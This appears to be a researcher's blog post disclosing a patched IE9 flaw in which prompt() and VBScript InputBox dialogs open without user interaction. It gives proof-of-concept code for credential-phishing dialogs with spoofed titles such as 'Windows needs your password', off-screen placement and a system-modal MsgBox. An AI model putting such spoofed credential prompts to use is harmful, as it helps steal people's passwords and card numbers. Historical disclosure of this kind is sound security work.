IE9: Prompt and VBScript InputBox Not Blocked Without User Interaction

IE8 blocked prompt() and VBScript’s InputBox when called without user interaction, similar to the window.open() popup blocker. IE9 did not apply those restrictions, allowing a page to open credential-harvesting dialogs from a setTimeout without the user touching anything.

// JavaScript prompt — opens without interaction
function jsPrompt() {
    prompt("Please, enter your credit card number", "");
}
setTimeout('jsPrompt()', 500);

// VBScript InputBox — opens without interaction, title can say anything
function vbInputBox() {
    execScript('InputBox "Please, enter your credit card number", "google.com needs some information"', 'VBScript');
}
setTimeout('vbInputBox()', 500);

// VBScript InputBox — can be positioned off-screen or outside browser bounds
execScript('InputBox "Please, log in again", "Windows needs your password", 0, 6000', 'VBScript');

// VBScript MsgBox — system-wide, appears on top of all windows
execScript('MsgBox "System alert", 4096', 'VBScript');

The VBScript InputBox was more dangerous because its title bar could be set to anything — “google.com needs some information” or “Windows needs your password” — with no indication of which website triggered it. It could also be positioned outside the browser window entirely, making it look like a system prompt rather than a web dialog. The 4096 flag on MsgBox made it a system-modal dialog on top of all applications.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9 UXSS: Location.prototype.replace Intercepts Cross-Origin Frame-Breaking] :: [IE9 Information Disclosure (Deadcall): Reading IFrame Location via toString] >